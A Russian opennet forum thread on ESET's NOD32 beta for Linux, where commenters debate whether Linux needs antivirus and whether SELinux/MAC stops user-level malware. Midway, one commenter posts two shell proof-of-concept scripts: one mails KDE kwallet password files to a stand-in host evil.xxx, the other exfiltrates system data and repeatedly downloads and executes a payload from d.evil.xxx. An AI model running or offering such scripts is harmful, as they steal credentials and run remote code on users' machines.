Компания Eset выпустила (http://www.eset.com/press-center/article/eset-releases-beta-...) вторую бета версию антивируса Nod32 для Linux и Macintosh, которая, по сравнению с beta 1, включает в себя следующие изменения:
- Значительно улучшена стабильность работы.
- Уменьшено потребление ресурсов системы.
- Добавлена возможность сканирования вирусов из выпадающего контекстного меню (какой среды - не уточняется, возможно, как KDE, так и Gnome).
- Режим полного экрана гарантирует непрерывную работу презентаций и игр за счёт отключения всплывающих окон.
- Косметические изменения: добавлен экран заставка при запуске (splash screen) и окно "О программе".
- Улучшены возможности конфигурирования приложения.Скачать программу можно по этому (http://www.adaox.ae/HomeEdnDownload/) адресу.
URL: http://www.eset.com/press-center/article/eset-releases-beta-...
Новость: http://www.opennet.me/opennews/art.shtml?num=26946
нафиг платный антивирус в linux?
>нафиг платный антивирус в linux?нафиг АНТИВИРУС в линукс?
Скорее так. Судя по всему, скоро можно будет ожидать потуги вирусозащитников настрогать линукс-вирусы с одновременным пропихиванием баек о жутчайшей необходимости антивирусов.
FUD, новая волна?
Поправлюсь.
Антивирус нужен лишь для защиты виндузь-машинок, собственно.
Ну и почта, конечно.
Антивирус нужен лишь для создания видимости защиты — так вернее.
Антивирус нужен для защиты бизнеса "антивирусных" контор. Вирусы, к слову говоря, нужны для того же самого.
Отвечаю: пользовательскую почту у sendmail проверять. Не Доктором Вебом единым живём (который у Яндекса).
Новость ниочем.
Для linux десктопа антивирус это как пятое колесо.
Для сервера есть clamav (почта, прокси).
>Новость ниочем.
>Для linux десктопа антивирус это как пятое колесо.
>Для сервера есть clamav (почта, прокси).clamav ловит < 35% in the wild вирусов, если вы админ, я бы вас уже уволил.
clamav это антивурус который запускается на сервере под управлением Linux с этого сервера данные поступают на виндовс-машины, но вирусы он ищет именно виндовые. А эта новость об антивирусе именно для Linux, т.е. подразумевается что ищутся вирусы которые написаны для Linux. Если учесть что количество вирусов под Linux равно нулю то возникает резонный вопрос: а на кой чёрт компания Eset выпустила антивирус предназначенный для поиска вирусов написанных для платформы Linux в то время как ни одного вируса для этой платформы не существует.
>clamav это антивурус который запускается на сервере под управлением Linux с этого
>сервера данные поступают на виндовс-машины, но вирусы он ищет именно виндовые.
>А эта новость об антивирусе именно для Linux, т.е. подразумевается что
>ищутся вирусы которые написаны для Linux.Нет. Все обычные антивирусы ищут вирусы для всех систем, о которых знают. Благо, ELF разбирать немногим сложнее PE.
> Если учесть что количество вирусов
>под Linux равно нулю то возникает резонный вопрос: а на кой
>чёрт компания Eset выпустила антивирус предназначенный для поиска вирусов написанных для
>платформы Linux в то время как ни одного вируса для этой
>платформы не существует.Существуют. Погуглите хотя бы сейчас, если не догадались сделать это перед своим ответом.
ссылки в студию.
вирус - это то что залезет на мой компьютер без каких либо дополнительных действий с моей стороны.
>ссылки в студию.Для тех, кто не умеет пользоваться поисковыми системами: http://vms.drweb.com/search/?q=Linux
>вирус - это то что залезет на мой компьютер без каких либо
>дополнительных действий с моей стороны.Это не просто вирус, это червь. «Классические» вирусы размножаются в пределах компьютера (как правило, внедряясь в исполняемый код — ныне таких вирусов всё меньше, так как в дебрях современных ОС легко спрятаться и так) и переносятся исключительно пассивным методом.
Это не вирусы. Я ведь написал выше - вирус это то что залезет на мой компьютер без дополнительных действий с моей стороны.
>Это не вирусы. Я ведь написал выше - вирус это то что
>залезет на мой компьютер без дополнительных действий с моей стороны.Если вы предпочитаете называть собаками только питбулей, это ваша проблема.
Правильно ответил. Человек из последнего пытается переубедить сам себя в обратном (чтоб не было горько от осознания факта).
Что касается червей, то, однако, даже на Виндоус, если не бывать в нете в зонах явного риска и не запускать тупо каждый присланный вам исполняемый файл, особенно, если вы и не собирались чего то "получать", не баловаться с "зипами" и, особенно, с "краками", сразу проверять подбираемые флешки, диски (кто-то когда-то говорил про автозапуск - спешу разочаровать вас - Виндоусы, по крайней мере начиная с ХР, при загрузке любого диска теперь спрашивают что делать с ним, если сам не настроишь на автозапуск), и вообще правильно настроить систему, т.е. ЕСЛИ вести себя адекватно и разумно, то 99%+ всяких червячьих эпидемий и руткитов пролетают мимо и даже не подозревают о вашем существовании, а "классические" вирусы вообще не угроза. Можно реально несколько лет просидеть на винде, практически не включая антивирус, и не подхватить ничего (не считая такой обыденности для винды, как вездесущий адваре) - это я говорю не теоретически, по своему опыту. Да, некоторые особо одарённые знакомые способны запаривать и заражать винду чуть ли не каждые 2 дня, но вот я, напр., был просидевши с ХР около 2 лет, без единого червя и вируса, не считая пары установленных шпионов (сам дурак скачал и установил кую-то мусорящую хрень из интереса) и какого-то, хмм, карася (который антивирь вначале даже не находил при проверках, т.е. не посчитал за вирус, ничего так и не смог сделать и ему хватило тупо удалить затаившийся исполняемый файл).
На линуксе вирусы - это, конечно, редчайшая экзотика, но не стоит наивно полагать, что их нет. Особенно теперь, как Линукс становится популярной мобильной платформой, и за него уже берутся клепатели антивирей - будь начеку, как грится.
>Что касается червей, то, однако, даже на Виндоус, если не бывать в
>нете в зонах явного риска и не запускать тупо каждый присланный
>вам исполняемый файл, особенно, если вы и не собирались чего то
>"получать", не баловаться с "зипами" и, особенно, с "краками", сразу проверять
>подбираемые флешки, диски (кто-то когда-то говорил про автозапуск - спешу разочаровать
>вас - Виндоусы, по крайней мере начиная с ХР, при загрузке
>любого диска теперь спрашивают что делать с ним, если сам не
>настроишь на автозапуск),Это при условии, что сам механизм в порядке. Один или два раза несколько лет назад всплывали баги, позволявшие срабатывать автозапуску даже в подобной ситуации. :(
> и вообще правильно настроить систему, т.е. ЕСЛИ вести
>себя адекватно и разумно, то 99%+ всяких червячьих эпидемий и руткитов
>пролетают мимо и даже не подозревают о вашем существовании, а "классические"
>вирусы вообще не угроза. Можно реально несколько лет просидеть на винде,
>практически не включая антивирус, и не подхватить ничего (не считая такой
>обыденности для винды, как вездесущий адваре) - это я говорю не
>теоретически, по своему опыту.Могу подтвердить: на домашнем компе в прошлой квартире стоял только фаервол (Tiny/Kerio/Sunbelt Personal Firewall). Специально проверялся иногда антивирусами — всё было чисто. Помимо меня компом пользовались двое человек с правами админа (им игрушки было надо, а эти сцуки капризные, даже runas не всегда помогает).
>[оверквотинг удален]
>я, напр., был просидевши с ХР около 2 лет, без единого
>червя и вируса, не считая пары установленных шпионов (сам дурак скачал
>и установил кую-то мусорящую хрень из интереса) и какого-то, хмм, карася
>(который антивирь вначале даже не находил при проверках, т.е. не посчитал
>за вирус, ничего так и не смог сделать и ему хватило
>тупо удалить затаившийся исполняемый файл).
>На линуксе вирусы - это, конечно, редчайшая экзотика, но не стоит наивно
>полагать, что их нет. Особенно теперь, как Линукс становится популярной мобильной
>платформой, и за него уже берутся клепатели антивирей - будь начеку,
>как грится.Да уже были мобильные эпидемии из-за багов в реализации BlueTooth и ещё чём-то смартфонном. Собственно, это одна из причин, почему до сих пор не хочу обзаводиться смартом. :)
Всё же пореккомендую по возможности сидеть как юзерам, а не как админам - так сразу всплывёт, если вдруг что-то где-то хочет пролезть\установиться\заполучить доступ. Вообще в таком режиме закрывается (особенно на 2000\ХР) абс. большинство всех потенц. уязвимостей. Антивирь по сути не особо и нужен. Токмо бесплатный антивирь Зайцева (AVZ) иногда прогнать - штука, ищет как раз руткиты, которые сами открывают дыры и "приглашают" вирусы, а так же некоторый гадкий хлам. В Висте\7 от многого спасает UAC (которого так поначалу не взлюбили "повер-виндузятники":)).
А все эти страхи вирусов - ну правильно, антивире-клепателям нужно продавать продукты, вот они и пугают всех массовыми эпидемиями - прям как фармакологические корпорации и эпидемии птичьего\свиного гриппа (и ведь на***ли весь свет, а какой следующий, козий? рыбий? может комариный?), может и сами руки где приложат к созданию, а затем - сразу эффектный тест, на котором "именно они всё нашли и защитили систему"...
>Всё же пореккомендую по возможности сидеть как юзерам, а не как админам
>- так сразу всплывёт, если вдруг что-то где-то хочет пролезть\установиться\заполучить доступ.
>Вообще в таком режиме закрывается (особенно на 2000\ХР) абс. большинство всех
>потенц. уязвимостей. Антивирь по сути не особо и нужен. Токмо бесплатный
>антивирь Зайцева (AVZ) иногда прогнать - штука, ищет как раз руткиты,
>которые сами открывают дыры и "приглашают" вирусы, а так же некоторый
>гадкий хлам. В Висте\7 от многого спасает UAC (которого так поначалу
>не взлюбили "повер-виндузятники":)).Угу, только юзер должен понимать, что к чему. А я там больше не живу, и кроме меня понимать там некому. Что говорить, если окно «Центра безопасности Windows XP» (или как оно там зовётся) мои Web-страницей называют…
>А все эти страхи вирусов - ну правильно, антивире-клепателям нужно продавать продукты,
>вот они и пугают всех массовыми эпидемиями - прям как фармакологические
>корпорации и эпидемии птичьего\свиного гриппа (и ведь на***ли весь свет, а
>какой следующий, козий? рыбий? может комариный?), может и сами руки где
>приложат к созданию, а затем - сразу эффектный тест, на котором
>"именно они всё нашли и защитили систему"...А вот это вы зря. Вам явно не приходилось большую локалку в конторе, работающей 24 часа в сутки, вычищать от червячков.
>[оверквотинг удален]
>
>Для тех, кто не умеет пользоваться поисковыми системами: http://vms.drweb.com/search/?q=Linux
>
>>вирус - это то что залезет на мой компьютер без каких либо
>>дополнительных действий с моей стороны.
>
>Это не просто вирус, это червь. «Классические» вирусы размножаются в пределах компьютера
>(как правило, внедряясь в исполняемый код — ныне таких вирусов всё
>меньше, так как в дебрях современных ОС легко спрятаться и так)
>и переносятся исключительно пассивным методом.Какая часть из них не требует gcc для сборки(мы, кстати, на production серверы специально его не ставим, пакеты лучше собирать в другом месте, на специальном сервере или контейнере), закрытых годы тому назад дырок, и...внимание!... рут-доступа?
Да, конечно, с рут-доступом взломщик насажает троянов на сервер :)
Этим "трояном" может быть и самописный демон на perl/python, слушающий сетевой порт, и создавший терминал, а может быть и что-то с Вашей странички :)Вот только меньше всего, при устранении последствий такого инцидента, я буду думать об установке антивируса на порутованную систему :)
Linux и Unix системы _люди_ не так уж и редко ломают (увы, все еще слишком много людей, ставящих систему из configure && make && make install, и забывающей о ней на годы, так как обновиться все равно нормально не получится), но вот Windows серверы и станции ломают промышленно, автоматически, на конвеере, и в миллионах экземпляров членов ботнетов.
Именно по этому завирусованная Windows машина идет на лечение (так как ее заражает простой робот), а затроянненый UNIX на пересетап, так как взломщик мог себе оставить незамеченную закладку, так что "nod32 для Linux" конечно нужен, но только для защиты Windows-машин :)
>[оверквотинг удален]
>на специальном сервере или контейнере), закрытых годы тому назад дырок, и...внимание!...
>рут-доступа?
>
>Да, конечно, с рут-доступом взломщик насажает троянов на сервер :)
>Этим "трояном" может быть и самописный демон на perl/python, слушающий сетевой порт,
>и создавший терминал, а может быть и что-то с Вашей странички
>:)
>
>Вот только меньше всего, при устранении последствий такого инцидента, я буду думать
>об установке антивируса на порутованную систему :)Вы, видимо, чуть-чуть запутались, ибо две темы сплелось: «чем черви отличаются от вирусов» и «вирусы для Linux». Да, «классическим» вирусам под Linux мало что светит. А вот вирусы, использующие shell (покажите мне POSIX-систему без /bin/sh), memory-only вирусы и т.д. вполне имеют шансы на жизнь — по мере роста популярности *nix на десктопах (то есть среди неквалифицированных пользователей) будет появляться всё больше заразы.
>Linux и Unix системы _люди_ не так уж и редко ломают (увы,
>все еще слишком много людей, ставящих систему из configure && make
>&& make install, и забывающей о ней на годы, так как
>обновиться все равно нормально не получится), но вот Windows серверы и
>станции ломают промышленно, автоматически, на конвеере, и в миллионах экземпляров членов
>ботнетов.В первую очередь за счёт большего единообразия Windows-машин, их изобилия и сравнительно низком среднем уровне квалификации пользователей. Станут никсы популярны на десктопах — огребут всё то же самое, с поправками на технические различия.
>Именно по этому завирусованная Windows машина идет на лечение (так как ее
>заражает простой робот), а затроянненый UNIX на пересетап, так как взломщик
>мог себе оставить незамеченную закладку, так что "nod32 для Linux" конечно
>нужен, но только для защиты Windows-машин :)Эх, оптимизм, оптимизм… :)
>Вы, видимо, чуть-чуть запутались, ибо две темы сплелось: «чем черви отличаются от
>вирусов» и «вирусы для Linux». Да, «классическим» вирусам под Linux мало
>что светит. А вот вирусы, использующие shell (покажите мне POSIX-систему без
>/bin/sh), memory-only вирусы и т.д. вполне имеют шансы на жизнь —
>по мере роста популярности *nix на десктопах (то есть среди неквалифицированных
>пользователей) будет появляться всё больше заразы.Если Вы помните, в похожей теме я высказывала аналогичную мысль (про sh-вирусы), однако, Вы забываете о наличии MAC под Linux: тот же SELinux, если корректно настроен, не даст ничего сделать любому протрояненному процессу, вроде Postfix, если процесс работает не под рутом.
Эсплойты на рута, которые выключают SELinux, конечно, есть, но не стоит забывать так же о том, что массовый приход контейнеров на базе CGroups на Linux-десктопы (это очень соблазнительно, запускать тот же Firefox в контейнере) дело самого ближайшего будущего, так же не стоит забывать о том, что большинство эсплойтов и вирусов будет запускаться с привелегиями юзера/браузера, а, значит, эффективно пресекаться MAC, и изолироваться Cgroups(поспамить процессу просто не дадут!)>
>В первую очередь за счёт большего единообразия Windows-машин, их изобилия и сравнительно
>низком среднем уровне квалификации пользователей. Станут никсы популярны на десктопах —
>огребут всё то же самое, с поправками на технические различия.Имхо, тут виноваты менеджеры Microsoft: они, конечно, у них, возможно, лучшие в мире (так суметь навариться на провальной Vista, и захватить рынок в 90-е... Это потрясающе!), но как технари, конечно, еще хуже штатных Microsoft'овских. Ими была допущена тотальная ошибка по интеграции IE в потроха системы так, что через его дырявые либы, после удаления оболочки IE, ломают другие браузеры!
+ еще можно вспомнить ActiveX.
Из-за ряда смертельных ошибок в области дизайна, дизайна Security(которые до сих пор не исправлены - UAC это концептуально технология 70-х годов), ну и доброй традиции выпуска патчей _после_ появления эсплойта (а так же традиции выпуска эсплойта на основе того, что пришло в Windows Update), мы имеем _только_ на Windows миллионые ботнеты, тогда как на незащищенном Mac OS X, доля которого приближается в мире к 10%, миллионых ботнетов нет (а ведь непаханное поле! У скольки процентов MAc OS X юзеров есть антивирусы?)>>Именно по этому завирусованная Windows машина идет на лечение (так как ее
>>заражает простой робот), а затроянненый UNIX на пересетап, так как взломщик
>>мог себе оставить незамеченную закладку, так что "nod32 для Linux" конечно
>>нужен, но только для защиты Windows-машин :)
>
>Эх, оптимизм, оптимизм… :)
>[оверквотинг удален]
>>вирусов» и «вирусы для Linux». Да, «классическим» вирусам под Linux мало
>>что светит. А вот вирусы, использующие shell (покажите мне POSIX-систему без
>>/bin/sh), memory-only вирусы и т.д. вполне имеют шансы на жизнь —
>>по мере роста популярности *nix на десктопах (то есть среди неквалифицированных
>>пользователей) будет появляться всё больше заразы.
>
>Если Вы помните, в похожей теме я высказывала аналогичную мысль (про sh-вирусы),
>однако, Вы забываете о наличии MAC под Linux: тот же SELinux,
>если корректно настроен, не даст ничего сделать любому протрояненному процессу, вроде
>Postfix, если процесс работает не под рутом.PoC №1:
#!/bin/sh
dcop kmail MailTransportServiceIface sendMessage '<me@domain>' '<bugster@evil.xxx>' '' '' 'Stupid man passwords' 'All this shit' "`echo ${KDEHOME:-~/.kde}/share/apps/kwallet/* | sed -e 's/ /:/g'`"PoC №2:
#!/bin/sh
ID="`mktemp -u XXXXXXXXXXXXXXXXXXXXX`"
dmesg >/tmp/"$ID".dmesg
apt-get list >/tmp/"$ID".pkglist
dcop kmail MailTransportServiceIface sendMessage '<me@domain>' '<bugster@evil.xxx>' '' '' 'Stupid man dmesg' "ID: ${ID}" /tmp/"$ID".dmesg:/tmp/"$ID".pkglist
rm /tmp/"$ID".d.txt
DOWNLOADER="`which wget` -O -"
if [ $? -ne 0]; then
DOWNLOADER="`which curl`"
fi
if [ $? -ne 0]; then
DOWNLOADER="`which ftp` -o -"
fi
while ! $DOWNLOADER "http://d.evil.xxx//${ID}" >/tmp/"$ID".killer; do sleep 3600; done
. /tmp/"$ID".killerEtc.
>Эсплойты на рута, которые выключают SELinux, конечно, есть, но не стоит забывать
>так же о том, что массовый приход контейнеров на базе CGroups
>на Linux-десктопы (это очень соблазнительно, запускать тот же Firefox в контейнере)
>дело самого ближайшего будущего, так же не стоит забывать о том,
>что большинство эсплойтов и вирусов будет запускаться с привелегиями юзера/браузера, а,
>значит, эффективно пресекаться MAC, и изолироваться Cgroups(поспамить процессу просто не дадут!)Самые опасные с точки зрения последствий зловреды прекрасно чувствуют себя под юзером. Ведь самое ценное что: а) пользовательские данные (пароли, документы, статистика, на худой конец); б) возможность что-то выполнять от имени вроде как аутентичного пользователя. А контейнеры сами по себе тоже не панацея — сколько уязвимостей, дающих порой возможности более богатые, чем root (!), уже понаходили в системах виртуализации?..
>[оверквотинг удален]
>другие браузеры!
>+ еще можно вспомнить ActiveX.
>Из-за ряда смертельных ошибок в области дизайна, дизайна Security(которые до сих пор
>не исправлены - UAC это концептуально технология 70-х годов), ну и
>доброй традиции выпуска патчей _после_ появления эсплойта (а так же традиции
>выпуска эсплойта на основе того, что пришло в Windows Update), мы
>имеем _только_ на Windows миллионые ботнеты, тогда как на незащищенном Mac
>OS X, доля которого приближается в мире к 10%, миллионых ботнетов
>нет (а ведь непаханное поле! У скольки процентов MAc OS X
>юзеров есть антивирусы?)Если развитие MacOS X будет идти теми же темпами, ситуация с ней скоро (в течение пары лет) «исправится». ;)
>[оверквотинг удален]
>>
>>Если Вы помните, в похожей теме я высказывала аналогичную мысль (про sh-вирусы),
>>однако, Вы забываете о наличии MAC под Linux: тот же SELinux,
>>если корректно настроен, не даст ничего сделать любому протрояненному процессу, вроде
>>Postfix, если процесс работает не под рутом.
>
>PoC №1:
>
>#!/bin/sh
>dcop kmail MailTransportServiceIface sendMessage '<me@domain>' '<bugster@evil.xxx>' '' '' 'Stupid man passwords' 'All this shit' "`echo ${KDEHOME:-~/.kde}/share/apps/kwallet/* | sed -e 's/ /:/g'`"1. dcop уже в прошлом, как им пользовались, уже не помню :)
2. что-то мне подсказывает, что штатный способ обращения к kdewallet другой, а, значит, будет пресечено SELinux>PoC №2:
Вырубится SELinux еще на попытке записать в /tmp
>[оверквотинг удален]
>>дело самого ближайшего будущего, так же не стоит забывать о том,
>>что большинство эсплойтов и вирусов будет запускаться с привелегиями юзера/браузера, а,
>>значит, эффективно пресекаться MAC, и изолироваться Cgroups(поспамить процессу просто не дадут!)
>
>Самые опасные с точки зрения последствий зловреды прекрасно чувствуют себя под юзером.
>Ведь самое ценное что: а) пользовательские данные (пароли, документы, статистика, на
>худой конец); б) возможность что-то выполнять от имени вроде как аутентичного
>пользователя. А контейнеры сами по себе тоже не панацея — сколько
>уязвимостей, дающих порой возможности более богатые, чем root (!), уже понаходили
>в системах виртуализации?..опять же, MAC решает :)
>Если развитие MacOS X будет идти теми же темпами, ситуация с ней
>скоро (в течение пары лет) «исправится». ;)Зачем? Если так удобно клепать ботнеты на Windows?
>[оверквотинг удален]
>>>однако, Вы забываете о наличии MAC под Linux: тот же SELinux,
>>>если корректно настроен, не даст ничего сделать любому протрояненному процессу, вроде
>>>Postfix, если процесс работает не под рутом.
>>
>>PoC 1:
>>
>>#!/bin/sh
>>dcop kmail MailTransportServiceIface sendMessage '<me@domain>' '<bugster@evil.xxx>' '' '' 'Stupid man passwords' 'All this shit' "`echo ${KDEHOME:-~/.kde}/share/apps/kwallet/* | sed -e 's/ /:/g'`"
>
>1. dcop уже в прошлом, как им пользовались, уже не помню :)А что непонятно? :)
>2. что-то мне подсказывает, что штатный способ обращения к kdewallet другой, а,
>значит, будет пресечено SELinuxТо есть SELinux запретит пользователю создавать резервную копию базы своих паролей?
>>PoC 2:
>
>Вырубится SELinux еще на попытке записать в /tmpВы что, серьёзно предлагаете запретить программам писать в /tmp?! К тому же, что помешает писать в этом случае, скажем, в хомяк? Простите, но, кажется, вы ещё не выпили свой кофе.
>>Самые опасные с точки зрения последствий зловреды прекрасно чувствуют себя под юзером.
>>Ведь самое ценное что: а) пользовательские данные (пароли, документы, статистика, на
>>худой конец); б) возможность что-то выполнять от имени вроде как аутентичного
>>пользователя. А контейнеры сами по себе тоже не панацея сколько
>>уязвимостей, дающих порой возможности более богатые, чем root (!), уже понаходили
>>в системах виртуализации?..
>
>опять же, MAC решает :)И как именно он решает проблемы, о которых сам админ явно не в курсе? Это не говоря о том, что предусмотреть ВСЁ в MAC практически нереально, только на простых конфигурациях - но там он уже просто излишний.
>>Если развитие MacOS X будет идти теми же темпами, ситуация с ней
>>скоро (в течение пары лет) исправится. ;)
>
>Зачем? Если так удобно клепать ботнеты на Windows?О том и речь, что их станет удобно клепать для MacOS X/Linux/нужное вписать?
>>2. что-то мне подсказывает, что штатный способ обращения к kdewallet другой, а,
>>значит, будет пресечено SELinux
>
>То есть SELinux запретит пользователю создавать резервную копию базы своих паролей?Пользователю, нет, а вот программе, запущенной в другом домене, конечно!
Почитайте, как работает, сам по себе, мандатный контроль.>>>PoC 2:
>>
>>Вырубится SELinux еще на попытке записать в /tmp
>
>Вы что, серьёзно предлагаете запретить программам писать в /tmp?!Это нужно далеко не всем программам, а в записи отслальных есть закономерности, к которым можно прицепиться.
>К тому же,
>что помешает писать в этом случае, скажем, в хомяк?SELinux. Программа будет выполняться в другом домене. Зачем ей это для повседневной работы?
>[оверквотинг удален]
>>>пользователя. А контейнеры сами по себе тоже не панацея сколько
>>>уязвимостей, дающих порой возможности более богатые, чем root (!), уже понаходили
>>>в системах виртуализации?..
>>
>>опять же, MAC решает :)
>
>И как именно он решает проблемы, о которых сам админ явно не
>в курсе? Это не говоря о том, что предусмотреть ВСЁ
>в MAC практически нереально, только на простых конфигурациях - но там
>он уже просто излишний.Правила для MAC будут постоянно писаться и развиваться для распространенных _десктопных_ приложений.
>>>Если развитие MacOS X будет идти теми же темпами, ситуация с ней
>>>скоро (в течение пары лет) исправится. ;)
>>
>>Зачем? Если так удобно клепать ботнеты на Windows?
>
>О том и речь, что их станет удобно клепать для MacOS X/Linux/нужное
>вписать?Пройдет одна эпидемия на бубунтах, и за воплями фанатиков Windows платформы, никто и не заметит, что все популярные дистрибутивы включат MAC по-дефольту, сгладят острые углы, прикрутят GUI для удобного создания политик, что решит проблему сразу и на корню (что в Windows и дискреционном, а не ролевом UAC невозможно)
>
>>>2. что-то мне подсказывает, что штатный способ обращения к kdewallet другой, а,
>>>значит, будет пресечено SELinux
>>
>>То есть SELinux запретит пользователю создавать резервную копию базы своих паролей?
>
>Пользователю, нет, а вот программе, запущенной в другом домене, конечно!
>Почитайте, как работает, сам по себе, мандатный контроль.Как устроен мандатный контроль знаю не понаслышке.
Значит, как минимум вытащат то, что можно из-под данного домена. В браузере и почтовом клиенте - пароли к сервисам, например.
>>Вы что, серьёзно предлагаете запретить программам писать в /tmp?!
>
>Это нужно далеко не всем программам, а в записи отслальных есть закономерности,
>к которым можно прицепиться.А что мешает к этим же закономерностям прицепиться внедрившемуся в браузерный плагин - или какую угодно программу - коду?
>>К тому же,
>>что помешает писать в этом случае, скажем, в хомяк?
>
>SELinux. Программа будет выполняться в другом домене. Зачем ей это для повседневной
>работы?Что, временные, конфигурационные, пользовательские файлы сохранять зачем? :)
>>>опять же, MAC решает :)
>>
>>И как именно он решает проблемы, о которых сам админ явно не
>>в курсе? Это не говоря о том, что предусмотреть ВСЁ
>>в MAC практически нереально, только на простых конфигурациях - но там
>>он уже просто излишний.
>
>Правила для MAC будут постоянно писаться и развиваться для распространенных _десктопных_ приложений.И постоянно опаздывать, ошибаться и не справляться. Как вы, например, средствами MAC запретите браузеру перезаписывать файлы, подконтрольные юзеру, без ущерба для его, пользователя, работы?
>Пройдет одна эпидемия на бубунтах, и за воплями фанатиков Windows платформы, никто
>и не заметит, что все популярные дистрибутивы включат MAC по-дефольту, сгладят
>острые углы, прикрутят GUI для удобного создания политик, что решит проблему
>сразу и на корню (что в Windows и дискреционном, а не
>ролевом UAC невозможно)Вы просто невозможная оптимистка :)
>И постоянно опаздывать, ошибаться и не справляться. Как вы, например, средствами MAC
>запретите браузеру перезаписывать файлы, подконтрольные юзеру, без ущерба для его, пользователя,
>работы?Браузер может сохранять картинки и заказчки только в одну директорию. Эта директория(ее поддиректории) могут быть для пользователя перемонтированы mount --bind на поддиректории картинок, документов, и т д.
Пользователи привыкнут :)
>
>>И постоянно опаздывать, ошибаться и не справляться. Как вы, например, средствами MAC
>>запретите браузеру перезаписывать файлы, подконтрольные юзеру, без ущерба для его, пользователя,
>>работы?
>
>Браузер может сохранять картинки и заказчки только в одну директорию. Эта директория(ее
>поддиректории) могут быть для пользователя перемонтированы mount --bind на поддиректории картинок,
>документов, и т д.
>
>Пользователи привыкнут :)Среди них не будет меня.
>Среди них не будет меня.А зачем Вам в браузере возможность читать и писать куда угодно в Вашем хомяке? Если идти по Вашей логике дальше, то неудобно и запускать браузер не под рутом.
Имхо, файл-менеджер из него плохой (cp, mv, ls, для end-user'ов какой-нибудь Dolphin, если уж начали про KDE, гораздо удобнее)
Уверена, что можно придумать структуру директорий, для которой несколько mount --bind сделают использование браузера удобным, как и сохранение и загрузка в/из него файлов
>[оверквотинг удален]
>
>А зачем Вам в браузере возможность читать и писать куда угодно в
>Вашем хомяке? Если идти по Вашей логике дальше, то неудобно и
>запускать браузер не под рутом.
>
>Имхо, файл-менеджер из него плохой (cp, mv, ls, для end-user'ов какой-нибудь Dolphin,
>если уж начали про KDE, гораздо удобнее)
>
>Уверена, что можно придумать структуру директорий, для которой несколько mount --bind сделают
>использование браузера удобным, как и сохранение и загрузка в/из него файловПотому что я всегда сразу кладу скачиваемый файл в нужную мне папку. Порой созданную за десять минут до этого — ищу информацию по какой-то теме, или программки-либы. И мне чертовски неудобно лазить отдельной программой в большую свалку по имени «Downloads».
И я такой не один.
>Потому что я всегда сразу кладу скачиваемый файл в нужную мне папку.Эти директории всегда находятся в корне хомяка, и начинаются с точки?
>
>>Потому что я всегда сразу кладу скачиваемый файл в нужную мне папку.
>
>Эти директории всегда находятся в корне хомяка, и начинаются с точки?А какая разница, где они находятся? Главное, что и я, и зловред, внедрившийся в исполняемый браузером код, туда можем записать что-то. Если браузер взломали, скажем, через ошибку в libjpeg, то следующая программа, которой я открою этот файл (или просто файловым менеджером в папку зайду со включённым показом превьюшек), скорее всего, схлопочет тот же stack code execution.
MAC в большинстве случаев не ставит стену против взломщика, а лишь сужает пролом. Если на сервере ещё как-то можно обычно поставить толковые ограничения, то на десктопе найти универсальные политики по определению нереально. Вон, в MS пробовали сделать роль Power Users — и что вышло? Вследствие ма-а-аленьких недоглядов паэурюзеры имели права почти неограниченные, хоть и не считаясь при этом формально администраторами. В итоге в Висте эту группу просто убрали, сдавшись. При большом желании можно выстроить политики для конкретного рабочего места, но не более. А сколько на это потребуется человеческих ресурсов? Например, я слабо представляю себе, как сделать MAC-политики для kdeinit, под которым выполняется куча сервисов, а-ля services.exe в винде.
А ещё домашние юзеры будут банально отключать MAC. Просто потому что при столь богато расписаных политиках система будет заметно тормозить. И с этим уже вряд ли что-то сделаешь, слишком много всего под капотом крутится в современных DE, что требует постоянных проверок на вшивость.
К слову, вы и сами сказали, что MAC не пользуетесь, и надеетесь, что не придётся. С чего бы, если по вашим словам, это панацея? ;)
>А какая разница, где они находятся? Главное, что и я, и зловред,
>внедрившийся в исполняемый браузером код, туда можем записать что-то. Если браузер
>взломали, скажем, через ошибку в libjpeg, то следующая программа, которой я
>открою этот файл (или просто файловым менеджером в папку зайду со
>включённым показом превьюшек), скорее всего, схлопочет тот же stack code execution.совсем не факт :)
>MAC в большинстве случаев не ставит стену против взломщика, а лишь сужает
>пролом. Если на сервере ещё как-то можно обычно поставить толковые ограничения,
>то на десктопе найти универсальные политики по определению нереально.В корпоративной среде вполне реально, а для дома сойдут и какие-то обще-типовые варианты + сgroups.
+, как я уже сказала, имхо, готовые правла для кучи приложений будут рулить.
Зачем вот, например, mc возможность соединяться с портом 25 на удаленных машинах?Поэтому зачем нужно будет создателям ботнетов пытаться с этим справиться? Можно будет как и раньше мучать винду, на которую и патчи выходят после появления эсплойта в паблике, и куча людей метасплойтом умеет пользоваться (труд таких кодеров более дешев), и нет ничего подобного MAC: ломаем любой сервис под SYSTEM, и получаем SYSTEM привелегии :)
>MS пробовали сделать роль Power Users — и что вышло?
У MS проблема кучи legacy софта, написанного криво, и требующего, для работы, административных привелегий.
>При большом желании можно выстроить политики для конкретного рабочего
>места, но не более. А сколько на это потребуется человеческих ресурсов?Мое предсказание, что совершенный минимум, и что настройка обоев и кнопочек под вкус пользователя будет занимать у HelpDesk службы как и сейчас гораздо больше времени.
После того, как всех немного поколбасит, будут и готовые сценарии для того же Puppet, и искоробочные решения вроде Sandbox (если что, я его еще не смотрела, но радует существование таких начинаний)>Например, я слабо представляю себе, как сделать MAC-политики для kdeinit, под
>которым выполняется куча сервисов, а-ля services.exe в винде.В KDE, с интеграцией WebKit/khtml наступают, увы, на грабли Microsoft.
>А ещё домашние юзеры будут банально отключать MAC.
Сперва, на первой волне, да. Но это не неповоротливый Microsoft, и не смотря на то, что Windows фанатики все еще будут вопить про вирусы в Linux, так вдруг окажется, что этим можно будет удобно пользоваться.
+ еще будут удобные технологии вроде повсеместного выполнения таких приложений, как браузеры в контейнерах.
>К слову, вы и сами сказали, что MAC не пользуетесь,
На десктопе не пользуюсь, так как сейчас нет смысла. Зачем обвешивать хижину на необитаемом острове амбарными замками, противопожарными системами безопасности, и пр?
>и надеетесь,
>что не придётся.Не совсем так: не хочу, что бы кто-то пытался проломить MAC на тех наших серверах, где он используется, а вдруг у него получиться?
Но вот его наличие греет душу.
>>А какая разница, где они находятся? Главное, что и я, и зловред,
>>внедрившийся в исполняемый браузером код, туда можем записать что-то. Если браузер
>>взломали, скажем, через ошибку в libjpeg, то следующая программа, которой я
>>открою этот файл (или просто файловым менеджером в папку зайду со
>>включённым показом превьюшек), скорее всего, схлопочет тот же stack code execution.
>
>совсем не факт :)
$ sqlite3 /usr/local/share/sqlports "SELECT COUNT(*) FROM Ports WHERE LIB_DEPENDS GLOB '*jpeg*' OR WANTLIB GLOB '*jpeg*';"
320
